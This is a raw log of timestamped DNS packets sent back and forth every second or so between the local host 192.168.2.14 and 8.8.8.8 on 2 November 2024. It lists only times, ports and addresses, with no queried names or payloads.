Nov 2, 2024 04:01:28.419584036 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:29.430043936 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:29.430476904 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:29.434907913 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:29.435235977 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:29.557589054 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:29.557766914 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:30.569361925 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:30.569559097 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:30.574345112 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:30.574357033 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:30.696787119 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:30.696809053 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:30.697079897 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:30.697079897 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:31.706772089 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:31.707434893 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:31.711680889 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:31.712215900 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:31.834140062 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:31.834156036 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:31.834326982 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:31.834347010 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:32.843408108 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:32.843611002 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:32.848211050 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:32.848314047 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:32.970031977 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:32.970057011 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:32.970299959 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:32.970312119 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:33.980844975 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:33.982065916 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:33.985769033 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:33.986907005 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:34.108175993 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:34.108387947 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:34.109184980 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:34.109262943 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:35.123511076 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:35.124129057 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:35.128437042 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:35.128868103 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:35.250823021 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:35.250837088 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:35.251143932 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:35.251143932 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:36.265413046 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:36.267595053 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:36.270339012 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:36.272396088 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:36.392046928 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:36.392369032 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:36.393955946 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:36.394021034 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:37.407047033 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:37.407491922 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:37.411915064 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:37.412275076 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:37.534313917 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:37.534535885 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:38.001293898 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:38.001549006 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:39.011508942 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:39.011918068 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:39.016410112 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:39.016666889 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:39.138890982 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:39.138902903 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:39.139072895 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:39.139072895 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:40.151834011 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:40.154289961 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:40.156763077 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:40.159173965 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:40.279294014 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:40.279422998 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:40.281145096 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:40.281207085 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:41.290709972 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:41.290803909 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:41.295568943 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:41.295583010 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:41.419142008 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:41.419322014 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:42.427287102 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:42.427362919 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:42.433429956 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:42.433470011 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:42.556165934 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:42.556458950 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:43.568923950 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:43.569123983 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:43.573939085 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:43.574141979 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:43.696048975 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:43.696137905 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:43.696146011 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:43.696191072 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:44.708317995 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:44.708749056 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:44.713136911 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:44.713510990 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:44.835591078 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:44.835767984 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:44.835772038 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:44.835834026 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:45.845041037 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:45.845263004 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:45.849842072 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:45.849983931 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:45.972666979 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:45.972824097 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:45.972842932 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:45.972889900 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:46.980421066 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:46.980421066 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:46.985347986 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:46.985364914 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:47.107358932 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:47.107687950 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:47.107712984 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:47.108093977 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:48.117764950 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:48.118249893 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:48.122579098 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:48.122967958 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:48.244293928 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:48.244384050 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:48.244410992 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:48.244568110 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:49.254297018 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:49.254726887 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:49.259089947 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:49.259419918 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:49.380858898 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:49.380954981 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:50.390446901 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:50.390818119 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:50.395374060 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:50.395623922 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:50.517347097 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:50.517524004 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:50.517600060 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:50.517668009 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:50.518078089 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:50.518178940 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:50.522984028 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:51.526467085 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:51.531402111 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:51.531456947 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:51.531472921 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:51.531493902 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:51.536361933 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:51.536377907 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:52.147279024 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:52.147588015 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:53.156604052 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:53.157052994 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:53.161382914 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:53.161881924 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:53.285083055 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:53.285137892 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:53.285334110 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:53.285334110 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:54.293931007 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:54.294876099 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:54.298775911 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:54.299895048 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:54.425256968 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:54.425333977 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:54.425431967 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:54.425476074 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:55.434772968 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:55.435173988 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:55.439670086 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:55.440021038 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:55.563379049 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:55.563471079 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:55.563704967 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:55.563760042 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:56.570622921 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:56.570787907 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:56.575449944 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:56.575491905 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:56.698791981 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:56.698904037 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:57.708838940 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:57.709297895 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:57.714637995 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:57.715173960 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:57.838073015 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:57.838238955 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:57.838414907 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:57.838414907 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:58.848160982 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:58.849942923 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:58.853116989 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:58.854918957 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:58.976593018 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:58.976898909 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:58.978538036 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:58.978588104 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:59.984518051 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:59.984735012 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:59.989408970 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:59.989558935 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:00.114701986 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:00.114865065 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:00.324327946 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:00.324652910 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:01.331068039 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:01.331854105 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:01.335916996 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:01.336666107 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:01.460661888 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:01.460851908 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:01.460872889 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:01.460922956 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:02.471175909 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:02.471350908 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:02.476035118 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:02.476169109 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:02.600512981 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:02.600554943 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:02.600593090 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:02.600593090 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:03.607954979 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:03.608158112 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:03.612898111 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:03.612956047 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:03.737323046 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:03.737440109 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:03.737519979 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:03.737519979 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:04.743849993 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:04.744091988 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:04.748822927 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:04.748990059 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:04.872252941 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:04.872376919 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:05.879232883 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:05.879479885 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:05.884627104 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:05.884643078 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:06.008400917 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:06.008593082 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:07.014983892 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:07.015053988 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:07.020559072 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:07.020581961 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:07.144063950 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:07.144155025 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:08.153928041 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:08.154824972 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:08.158823013 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:08.159598112 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:08.282931089 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:08.283165932 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:08.283871889 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:08.283919096 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:09.290505886 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:09.290699005 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:09.295495033 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:09.295507908 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:09.419079065 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:09.419255018 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:10.429328918 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:10.429550886 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:10.435396910 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:10.435568094 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:10.559438944 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:10.559549093 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:10.559731960 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:10.559811115 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:11.570827961 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:11.571274996 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:11.576791048 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:11.576879978 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:11.701862097 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:11.702028990 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:12.711421013 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:12.711772919 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:12.716466904 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:12.716532946 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:12.839504957 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:12.839601994 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:12.839752913 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:12.839940071 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:13.848530054 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:13.848761082 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:13.853528976 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:13.853594065 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:13.977197886 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:13.977217913 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:13.977324009 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:13.977324009 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:14.984790087 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:14.985975981 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:14.989819050 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:14.990869045 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:15.113302946 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:15.113454103 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:15.114090919 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:15.114145994 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:16.121254921 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:16.121440887 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:16.126317024 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:16.126337051 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:16.249855995 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:16.249959946 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:17.262840986 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:17.263561964 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:17.267594099 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:17.268410921 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:17.392385006 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:17.392541885 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:17.392802954 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:17.392867088 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:18.401252031 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:18.403479099 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:18.406136990 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:18.408323050 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:18.530814886 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:18.530973911 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:18.533071995 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:18.533135891 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:19.541740894 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:19.542654991 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:19.546756983 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:19.547401905 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:19.671215057 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:19.671358109 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:19.671509027 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:19.671681881 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:20.678911924 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:20.679543972 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:20.683737040 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:20.684323072 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:20.807504892 CET	53	45294	8.8.8.8	192.168.2.14
